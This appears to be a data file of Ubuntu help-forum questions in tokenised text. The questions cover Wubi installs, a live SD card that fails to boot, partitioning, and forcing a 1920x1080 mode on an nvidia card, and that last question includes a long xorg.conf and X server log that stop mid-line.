188045	convert wubi to full install	after installing ubuntu inside windows is there a possibility to separate ubuntu from windows and make it as another os . i 'm trying to say that i only used windows to install ubuntu and then after that i can have an os without going through windows `` os-select '' .
188046	live-ubuntu 12.04 ran fine , now stopped booting !	i 've seen similar problems to this several times in the forum , but mine is a bit different , so the other posts i saw were no help to me . when i boot ubuntu 12.04 64-bit from live-sd-card ( 3gb persistence ) i suddenly get this error : ( initramfs ) mount : mounting /dev/loop0 on //filesystem.squashfs failed : invalid argument can not mount /dev/loop/0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs ( it says i can type `` help '' for commands , but i do n't know anything about how to go from there , totally new to linux ) the reason i say my case is different is because my ubuntu worked fine for over a week , even pretty fast , and now this problem happened . before that i used to run my live ubuntu from usb sticks but that was slower ( especially when booting which took 15 minutes from usb stick ! ) . also i kept getting the same above problem after a while when booting and had to re-create a live usb several times . installing on harddrive is not an option because my harddrive has physically damaged and getting a replacement will take a while , therefore i can only use live-usb or live-sd-card ubuntu . as i said i used ubuntu without problems for more than a week , before that as well for several weeks on usb sticks , but the above problem occurred sooner or later . this time i paid attention to when it happened : i was rebooting my computer ( hp 620 laptop , 4 gb ram , 64 bit system ) from sd flash card and when i was booting i selected f6 and then the first option `` no acpi '' or something like that ... i had used it before and noticed it slowed down the time it took linux to use . this time it caused this error . now even when i boot normally/default i get this error . now i 'm accessing ubuntu from my usb stick without persistence file , when i check my sd card , all the files mentioned in the error message are there and the filesystem.squashfs is 691.2 mb so nothing seems to have been deleted by accident . ( i have already made many changes/downloaded programs to my sd card persistent ubuntu and do n't want to loose them , since downloading is expensive for me , and since the problem seems to re-occur ... ) can anyone help me , preferably without having to create another startup disk on my sd card ? i 'm totally new to this . sorry for the long posts , just did n't know what info is relevant and what is n't !
188048	12.04 started in low graphics mode , could n't fix	i just restarted my computer and went into low graphics mode . after some attempted fixes ( using all the solutions i could find for 12.04 via google ) , i have n't fixed it . i tried solutions including installing then removing gdm , and purging lightdm . history : - i installed the most recent ubuntu updates today ( 15th sept ) , which required a restart - i tried to uninstall wine ( i do n't know if it did , the remove button did n't work ) - i installed and tried to uninstall bombono dvd that 's it . i had n't touched anything to do with graphics drivers , which makes me suspect that the problem lies with a recent update package . now i 'm unable to get to the login screen . how do i fix this ?
188051	how to setup remote encrypted dir with conflict handling ?	is it possible to setup a remote server to store a folder with encrypted contents , which is impossible to read by the server , but is editable by multiple clients ? it seems like duplicity is a tool for this , but i 'm not sure if any data loss is possible if 2 workstations try to edit the same file simultaneously ?
188052	get a list of all files in folder and sub-folder in a file	in ubuntu 12.04 , how to get a list of all files in a folder , including all the files within all the subfolders and put the output in a file ?
188056	how to create fifth drive for ubuntu on win7 ?	i have win7 with 4 drives ( basic disk ) and a lot of unallocated space ... . now i want to create 5th drive for ubuntu ... but windows do n't let me create 5th without making the disk dynamic . i do n't want to make the disk dynamic at all ... on my other computer there is a basic disk with more than 4 drives ! on win7 and it does n't prompt me to make it dynamic ( like a good guy : ) ) . as far as possible i want to install ubuntu on separate drive and not inside windows ... what can i do ? thanks in advanced ... . edit -- > one of the 4 partitions is : `` system reserved '' only 100 mb active partition which is not show in computer ... is it necessary ? what if i delete it ?
188060	force video mode without edid information	i want to force my native display resolution of 1920x1080 although no edid information is available . my desktop is hooked up to a vga switch and is therefore unable to query the edid ( it works fine without the switch ) . all attempts to force x to use the native resolution failed . the resolution always drops to the nvidia-auto-select which selects a mode from the predefined mode pool . custom modes are ignored without any error . i also tried useedid instead of ăgnoreedid in the device and screen section . i 'm using a nvidia 430 with the nvidia driver . below is my xorg.conf section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' modeline `` 1920x1080_new '' 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync +vsync option `` preferred mode '' `` 1920x1080_new '' option `` exactmodetimingsdvi '' `` true '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' option `` useedidfreqs '' `` false '' option `` useediddpi '' `` false '' option `` ignoreedid '' `` true '' option `` modevalidation '' `` novesamodes , noxservermodes , noedidmodes '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` metamodes '' `` 1920x1080_new '' subsection `` display '' depth 24 modes `` 1920x1080_new '' endsubsection endsection here is the xlog with the switch . i also tried another switch with the same result . [ 1402.712 ] x.org x server 1.11.3 release date : 2011-12-16 [ 1402.712 ] x protocol version 11 , revision 0 [ 1402.712 ] build operating system : linux 2.6.42-26-generic i686 ubuntu [ 1402.712 ] current operating system : linux desktopaw 3.2.0-30-generic-pae # 48-ubuntu smp fri aug 24 17:14:09 utc 2012 i686 [ 1402.712 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-30-generic-pae root=uuid=280c1a92-ec50-4b1a-828c-c8fac158e875 ro quiet splash [ 1402.712 ] build date : 04 august 2012 01:51:24am [ 1402.712 ] xorg-server 2:1.11.4-0ubuntu10.7 ( for technical support please see http : //www.ubuntu.com/support ) [ 1402.712 ] current version of pixman : 0.24.4 [ 1402.712 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 1402.712 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1402.712 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat sep 15 12:40:36 2012 [ 1402.713 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 1402.713 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 1402.713 ] ( == ) no layout section . using the first screen section . [ 1402.713 ] ( ** ) | -- > screen `` my screen '' ( 0 ) [ 1402.713 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 1402.713 ] ( == ) no device specified for screen `` my screen '' . using the first device section listed . [ 1402.713 ] ( ** ) | | -- > device `` my card '' [ 1402.713 ] ( == ) no monitor specified for screen `` my screen '' . using a default monitor configuration . [ 1402.713 ] ( == ) automatically adding devices [ 1402.713 ] ( == ) automatically enabling devices [ 1402.713 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 1402.713 ] entry deleted from font path . [ 1402.713 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 1402.714 ] entry deleted from font path . [ 1402.714 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 1402.714 ] entry deleted from font path . [ 1402.714 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 1402.714 ] entry deleted from font path . [ 1402.714 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 1402.714 ] entry deleted from font path . [ 1402.714 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 1402.714 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 1402.714 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 1402.714 ] ( ii ) loader magic : 0xb77ef5a0 [ 1402.714 ] ( ii ) module abi versions : [ 1402.714 ] x.org ansi c emulation : 0.4 [ 1402.714 ] x.org video driver : 11.0 [ 1402.714 ] x.org xinput driver : 16.0 [ 1402.714 ] x.org server extension : 6.0 [ 1402.714 ] ( -- ) pci : * ( 0:2:0:0 ) 10de:0de1:3842:1335 rev 161 , mem @ 0xf8000000/16777216 , 0xe8000000/134217728 , 0xf0000000/33554432 , i/o @ 0x0000a000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 1402.714 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 1402.714 ] ( ii ) loadmodule : `` extmod '' [ 1402.715 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 1402.715 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 1402.715 ] compiled for 1.11.3 , module version = 1.0.0 [ 1402.715 ] module class : x.org server extension [ 1402.715 ] abi class : x.org server extension , version 6.0 [ 1402.715 ] ( ii ) loading extension mit-screen-saver [ 1402.715 ] ( ii ) loading extension xfree86-vidmodeextension [ 1402.715 ] ( ii ) loading extension xfree86-dga [ 1402.715 ] ( ii ) loading extension dpms [ 1402.715 ] ( ii ) loading extension xvideo [ 1402.715 ] ( ii ) loading extension xvideo-motioncompensation [ 1402.715 ] ( ii ) loading extension x-resource [ 1402.715 ] ( ii ) loadmodule : `` dbe '' [ 1402.715 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 1402.716 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 1402.716 ] compiled for 1.11.3 , module version = 1.0.0 [ 1402.716 ] module class : x.org server extension [ 1402.716 ] abi class : x.org server extension , version 6.0 [ 1402.716 ] ( ii ) loading extension double-buffer [ 1402.716 ] ( ii ) loadmodule : `` glx '' [ 1402.716 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/libglx.so [ 1402.753 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 1402.753 ] compiled for 4.0.2 , module version = 1.0.0 [ 1402.753 ] module class : x.org server extension [ 1402.753 ] ( ii ) nvidia glx module 295.40 thu apr 5 21:49:54 pdt 2012 [ 1402.753 ] ( ii ) loading extension glx [ 1402.753 ] ( ii ) loadmodule : `` record '' [ 1402.754 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 1402.754 ] ( ii ) module record : vendor= '' x.org foundation '' [ 1402.754 ] compiled for 1.11.3 , module version = 1.13.0 [ 1402.754 ] module class : x.org server extension [ 1402.754 ] abi class : x.org server extension , version 6.0 [ 1402.754 ] ( ii ) loading extension record [ 1402.754 ] ( ii ) loadmodule : `` dri '' [ 1402.754 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 1402.754 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 1402.754 ] compiled for 1.11.3 , module version = 1.0.0 [ 1402.754 ] abi class : x.org server extension , version 6.0 [ 1402.754 ] ( ii ) loading extension xfree86-dri [ 1402.754 ] ( ii ) loadmodule : `` dri2 '' [ 1402.754 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 1402.754 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 1402.754 ] compiled for 1.11.3 , module version = 1.2.0 [ 1402.754 ] abi class : x.org server extension , version 6.0 [ 1402.755 ] ( ii ) loading extension dri2 [ 1402.755 ] ( ii ) loadmodule : `` nvidia '' [ 1402.755 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 1402.755 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 1402.755 ] compiled for 4.0.2 , module version = 1.0.0 [ 1402.755 ] module class : x.org video driver [ 1402.755 ] ( ii ) nvidia dlloader x driver 295.40 thu apr 5 21:29:50 pdt 2012 [ 1402.755 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 1402.755 ] ( ++ ) using vt number 7 [ 1402.757 ] ( ii ) loading sub module `` fb '' [ 1402.757 ] ( ii ) loadmodule : `` fb '' [ 1402.757 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 1402.758 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 1402.758 ] compiled for 1.11.3 , module version = 1.0.0 [ 1402.758 ] abi class : x.org ansi c emulation , version 0.4 [ 1402.758 ] ( ii ) loading sub module `` wfb '' [ 1402.758 ] ( ii ) loadmodule : `` wfb '' [ 1402.758 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 1402.758 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 1402.758 ] compiled for 1.11.3 , module version = 1.0.0 [ 1402.758 ] abi class : x.org ansi c emulation , version 0.4 [ 1402.758 ] ( ii ) loading sub module `` ramdac '' [ 1402.758 ] ( ii ) loadmodule : `` ramdac '' [ 1402.758 ] ( ii ) module `` ramdac '' already built-in [ 1402.758 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 1402.758 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 1402.758 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 1402.758 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` my screen '' for depth/fbbpp 24/32 [ 1402.758 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 1402.758 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 1402.758 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 1402.758 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 1402.758 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 1402.759 ] ( ** ) nvidia ( 0 ) : option `` registrydwords '' `` enablebrightnesscontrol=1 '' [ 1402.759 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 1403.579 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-1 [ 1403.581 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 430 ( gf108 ) at pci:2:0:0 ( gpu-0 ) [ 1403.581 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 1403.581 ] ( -- ) nvidia ( 0 ) : videobios : 70.08.29.00.40 [ 1403.581 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 1403.581 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 1403.582 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on geforce gt 430 at pci:2:0:0 [ 1403.583 ] ( -- ) nvidia ( 0 ) : crt-1 [ 1403.583 ] ( -- ) nvidia ( 0 ) : crt-1 : 320.0 mhz maximum pixel clock [ 1403.592 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 1403.592 ] ( ** ) nvidia ( 0 ) : device crt-1 ( using edid frequencies has been enabled on [ 1403.592 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 1403.596 ] ( ii ) nvidia ( 0 ) : assigned display device : crt-1 [ 1403.597 ] ( == ) nvidia ( 0 ) : [ 1403.597 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 1403.597 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 1403.597 ] ( == ) nvidia ( 0 ) : [ 1403.597 ] ( ii ) nvidia ( 0 ) : validated modes : [ 1403.597 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 1403.597 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1024 x 768 [ 1403.621 ] ( ww ) nvidia ( 0 ) : unable to get display device crt-1 's edid ; can not compute dpi [ 1403.621 ] ( ww ) nvidia ( 0 ) : from crt-1 's edid . [ 1403.621 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 1403.621 ] ( -- ) depth 24 pixmap format is 32 bpp [ 1403.621 ] ( ii ) nvidia : using 1024.00 mb of virtual memory for indirect memory [ 1403.621 ] ( ii ) nvidia : access . [ 1403.626 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 1403.650 ] ( ii ) loading extension nv-glx [ 1403.710 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 1403.710 ] ( == ) nvidia ( 0 ) : backing store disabled [ 1403.710 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 1403.710 ] ( == ) nvidia ( 0 ) : dpms enabled [ 1403.710 ] ( ii ) loading extension nv-control [ 1403.711 ] ( ii ) loading extension xinerama [ 1403.711 ] ( ii ) loading sub module `` dri2 '' [ 1403.711 ] ( ii ) loadmodule : `` dri2 '' [ 1403.711 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 1403.711 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 1403.711 ] compiled for 1.11.3 , module version = 1.2.0 [ 1403.711 ] abi class : x.org server extension , version 6.0 [ 1403.711 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 1403.711 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 1403.711 ] ( == ) randr enabled [ 1403.711 ] ( ii ) initializing built-in extension generic event extension [ 1403.711 ] ( ii ) initializing built-in extension shape [ 1403.711 ] ( ii ) initializing built-in extension mit-shm [ 1403.711 ] ( ii ) initializing built-in extension xinputextension [ 1403.711 ] ( ii ) initializing built-in extension xtest [ 1403.711 ] ( ii ) initializing built-in extension big-requests [ 1403.711 ] ( ii ) initializing built-in extension sync [ 1403.711 ] ( ii ) initializing built-in extension xkeyboard [ 1403.711 ] ( ii ) initializing built-in extension xc-misc [ 1403.711 ] ( ii ) initializing built-in extension security [ 1403.711 ] ( ii ) initializing built-in extension xinerama [ 1403.711 ] ( ii ) initializing built-in extension xfixes [ 1403.711 ] ( ii ) initializing built-in extension render [ 1403.711 ] ( ii ) initializing built-in extension randr [ 1403.711 ] ( ii ) initializing built-in extension composite [ 1403.711 ] ( ii ) initializing built-in extension damage [ 1403.714 ] ( ii ) initializing extension glx [ 1403.741 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 1403.746 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 1403.746 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 1403.746 ] ( ii ) loadmodule : `` evdev '' [ 1403.746 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.746 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 1403.746 ] compiled for 1.11.3 , module version = 2.7.0 [ 1403.746 ] module class : x.org xinput driver [ 1403.746 ] abi class : x.org xinput driver , version 16.0 [ 1403.746 ] ( ii ) using input driver 'evdev ' for 'power button' [ 1403.746 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.746 ] ( ** ) power button : always reports core events [ 1403.746 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 1403.746 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 1403.746 ] ( -- ) evdev : power button : found keys [ 1403.746 ] ( ii ) evdev : power button : configuring as keyboard [ 1403.746 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 1403.746 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 1403.746 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 1403.746 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 1403.746 ] ( ** ) option `` xkb_layout '' `` de '' [ 1403.749 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-808bba3d4c227bdb44c370226c34e44c5d69a4a9.xkm [ 1403.750 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 1403.750 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 1403.750 ] ( ii ) using input driver 'evdev ' for 'power button' [ 1403.750 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.751 ] ( ** ) power button : always reports core events [ 1403.751 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 1403.751 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 1403.751 ] ( -- ) evdev : power button : found keys [ 1403.751 ] ( ii ) evdev : power button : configuring as keyboard [ 1403.751 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 1403.751 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 1403.751 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 1403.751 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 1403.751 ] ( ** ) option `` xkb_layout '' `` de '' [ 1403.751 ] ( ii ) config/udev : adding input device razer razer diamondback 3g ( /dev/input/event2 ) [ 1403.752 ] ( ** ) razer razer diamondback 3g : applying inputclass `` evdev pointer catchall '' [ 1403.752 ] ( ii ) using input driver 'evdev ' for 'razer razer diamondback 3g' [ 1403.752 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.752 ] ( ** ) razer razer diamondback 3g : always reports core events [ 1403.752 ] ( ** ) evdev : razer razer diamondback 3g : device : `` /dev/input/event2 '' [ 1403.752 ] ( -- ) evdev : razer razer diamondback 3g : vendor 0x1532 product 0xd [ 1403.752 ] ( -- ) evdev : razer razer diamondback 3g : found 11 mouse buttons [ 1403.752 ] ( -- ) evdev : razer razer diamondback 3g : found scroll wheel ( s ) [ 1403.752 ] ( -- ) evdev : razer razer diamondback 3g : found relative axes [ 1403.752 ] ( -- ) evdev : razer razer diamondback 3g : found x and y relative axes [ 1403.752 ] ( ii ) evdev : razer razer diamondback 3g : configuring as mouse [ 1403.752 ] ( ii ) evdev : razer razer diamondback 3g : adding scrollwheel support [ 1403.752 ] ( ** ) evdev : razer razer diamondback 3g : yaxismapping : buttons 4 and 5 [ 1403.752 ] ( ** ) evdev : razer razer diamondback 3g : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 1403.752 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:02.0/usb2/2-8/2-8:1.0/input/input2/event2 '' [ 1403.752 ] ( ii ) xinput : adding extended input device `` razer razer diamondback 3g '' ( type : mouse , id 8 ) [ 1403.752 ] ( ii ) evdev : razer razer diamondback 3g : initialized for relative axes . [ 1403.752 ] ( ** ) razer razer diamondback 3g : ( accel ) keeping acceleration scheme 1 [ 1403.752 ] ( ** ) razer razer diamondback 3g : ( accel ) acceleration profile 0 [ 1403.752 ] ( ** ) razer razer diamondback 3g : ( accel ) acceleration factor : 2.000 [ 1403.752 ] ( ** ) razer razer diamondback 3g : ( accel ) acceleration threshold : 4 [ 1403.753 ] ( ii ) config/udev : adding input device razer razer diamondback 3g ( /dev/input/mouse0 ) [ 1403.753 ] ( ii ) no input driver specified , ignoring this device . [ 1403.753 ] ( ii ) this device may have been added with another device file . [ 1403.753 ] ( ii ) config/udev : adding input device uvc camera ( 046d:0804 ) ( /dev/input/event5 ) [ 1403.753 ] ( ** ) uvc camera ( 046d:0804 ) : applying inputclass `` evdev keyboard catchall '' [ 1403.753 ] ( ii ) using input driver 'evdev ' for 'uvc camera ( 046d:0804 ) ' [ 1403.753 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.753 ] ( ** ) uvc camera ( 046d:0804 ) : always reports core events [ 1403.753 ] ( ** ) evdev : uvc camera ( 046d:0804 ) : device : `` /dev/input/event5 '' [ 1403.753 ] ( -- ) evdev : uvc camera ( 046d:0804 ) : vendor 0x46d product 0x804 [ 1403.753 ] ( -- ) evdev : uvc camera ( 046d:0804 ) : found keys [ 1403.753 ] ( ii ) evdev : uvc camera ( 046d:0804 ) : configuring as keyboard [ 1403.753 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:02.1/usb1/1-9/1-9.1/1-9.1:1.0/input/input5/event5 '' [ 1403.753 ] ( ii ) xinput : adding extended input device `` uvc camera ( 046d:0804 ) '' ( type : keyboard , id 9 ) [ 1403.753 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 1403.753 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 1403.753 ] ( ** ) option `` xkb_layout '' `` de '' [ 1403.754 ] ( ii ) config/udev : adding input device hid 046a:0023 ( /dev/input/event3 ) [ 1403.754 ] ( ** ) hid 046a:0023 : applying inputclass `` evdev keyboard catchall '' [ 1403.754 ] ( ii ) using input driver 'evdev ' for 'hid 046a:0023' [ 1403.754 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.754 ] ( ** ) hid 046a:0023 : always reports core events [ 1403.754 ] ( ** ) evdev : hid 046a:0023 : device : `` /dev/input/event3 '' [ 1403.754 ] ( -- ) evdev : hid 046a:0023 : vendor 0x46a product 0x23 [ 1403.754 ] ( -- ) evdev : hid 046a:0023 : found keys [ 1403.754 ] ( ii ) evdev : hid 046a:0023 : configuring as keyboard [ 1403.754 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:02.1/usb1/1-9/1-9.4/1-9.4:1.0/input/input3/event3 '' [ 1403.754 ] ( ii ) xinput : adding extended input device `` hid 046a:0023 '' ( type : keyboard , id 10 ) [ 1403.754 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 1403.754 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 1403.754 ] ( ** ) option `` xkb_layout '' `` de '' [ 1403.755 ] ( ii ) config/udev : adding input device hid 046a:0023 ( /dev/input/event4 ) [ 1403.755 ] ( ** ) hid 046a:0023 : applying inputclass `` evdev keyboard catchall '' [ 1403.755 ] ( ii ) using input driver 'evdev ' for 'hid 046a:0023' [ 1403.755 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 1403.755 ] ( ** ) hid 046a:0023 : always reports core events [ 1403.755 ] ( ** ) evdev : hid 046a:0023 : device : `` /dev/input/event4 '' [ 1403.755 ] ( -- ) evdev : hid 046a:0023 : vendor 0x46a product 0x23 [ 1403.755 ] ( -- ) evdev : hid 046a:0023 : found 1 mouse buttons [ 1403.755 ] ( -- ) evdev : hid 046a:0023 : found scroll wheel ( s ) [ 1403.755 ] ( -- ) evdev : hid 046a:0023 : found relative axes [ 1403.755 ] ( ii ) evdev : hid 046a:0023 : forcing relative x/y axes to exist . [ 1403.755 ] ( -- ) evdev : hid 046a:0023 : found absolute axes [ 1403.755 ] ( ii ) evdev : hid 046a:0023 : forcing absolute x/y axes to exist . [ 1403.755 ] ( -- ) evdev : hid 046a:0023 : found keys [ 1403.756 ] ( ii ) evdev : hid 046a:0023 : configuring as mouse [ 1403.756 ] ( ii ) evdev : hid 046a:0023 : configuring as keyboard [ 1403.756 ] ( ii ) evdev : hid 046a:0023 : adding scrollwheel support [ 1403.756 ] ( ** ) evdev : hid 046a:0023 : yaxismapping : buttons 4 and 5 [ 1403.756 ] ( ** ) evdev : hid 046a:0023 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 1403.756 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:02.1/usb1/1-9/1-9.4/1-9.4:1.1/input/input4/event4 '' [ 1403.756 ] ( ii ) xinput : adding extended input device `` hid 046a:0023 '' ( type : keyboard , id 11 ) [ 1403.756 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 1403.756 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 1403.756 ] ( ** ) option `` xkb_layout '' `` de '' [ 1403.756 ] ( ii ) evdev : hid 046a:0023 : initialized for relative axes . [ 1403.756 ] ( ww ) evdev : hid 046a:0023 : ignoring absolute axes . [ 1403.756 ] ( ** ) hid 046a:0023 : ( accel ) keeping acceleration scheme 1 [ 1403.756 ] ( ** ) hid 046a:0023 : ( accel ) acceleration profile 0 [ 1403.756 ] ( ** ) hid 046a:0023 : ( accel ) acceleration factor : 2.000 [ 1403.756 ] ( ** ) hid 046a:0023 : ( accel ) acceleration threshold : 4 [ 1403.757 ] ( ii ) config/udev : adding input device hda nvidia line-out side ( /dev/input/event10 ) [ 1403.757 ] ( ii ) no input driver specified , ignoring this device . [ 1403.757 ] ( ii ) this device may have been added with another device file . [ 1403.757 ] ( ii ) config/udev : adding input device hda nvidia line-out clfe ( /dev/input/event11 ) [ 1403.757 ] ( ii ) no input driver specified , ignoring this device . [ 1403.757 ] ( ii ) this device may have been added with another device file . [ 1403.757 ] ( ii ) config/udev : adding input device hda nvidia line-out surround ( /dev/input/event12 ) [ 1403.757 ] ( ii ) no input driver specified , ignoring this device . [ 1403.757 ] ( ii ) this device may have been added with another device file . [ 1403.758 ] ( ii ) config/udev : adding input device hda nvidia line-out front ( /dev/input/event13 ) [ 1403.758 ] ( ii ) no input driver specified , ignoring this device . [ 1403.758 ] ( ii ) this device may have been added with another device file . [ 1403.758 ] ( ii ) config/udev : adding input device hda nvidia line ( /dev/input/event6 ) [ 1403.758 ] ( ii ) no input driver specified , ignoring this device . [ 1403.758 ] ( ii ) this device may have been added with another device file . [ 1403.758 ] ( ii ) config/udev : adding input device hda nvidia front mic ( /dev/input/event7 ) [ 1403.758 ] ( ii ) no input driver specified , ignoring this device . [ 1403.758 ] ( ii ) this device may have been added with another device file . [ 1403.759 ] ( ii ) config/udev : adding input device hda nvidia rear mic ( /dev/input/event8 ) [ 1403.759 ] ( ii ) no input driver specified , ignoring this device . [ 1403.759 ] ( ii ) this device may have been added with another device file . [ 1403.759 ] ( ii ) config/udev : adding input device hda nvidia front headphone ( /dev/input/event9 ) [ 1403.759 ] ( ii ) no input driver specified , ignoring this device . [ 1403.759 ] ( ii ) this device may have been added with another device file . [ 1403.759 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=9 ( /dev/input/event14 ) [ 1403.759 ] ( ii ) no input driver specified , ignoring this device . [ 1403.759 ] ( ii ) this device may have been added with another device file . [ 1403.760 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=8 ( /dev/input/event15 ) [ 1403.760 ] ( ii ) no input driver specified , ignoring this device . [ 1403.760 ] ( ii ) this device may have been added with another device file . [ 1403.760 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=7 ( /dev/input/event16 ) [ 1403.760 ] ( ii ) no input driver 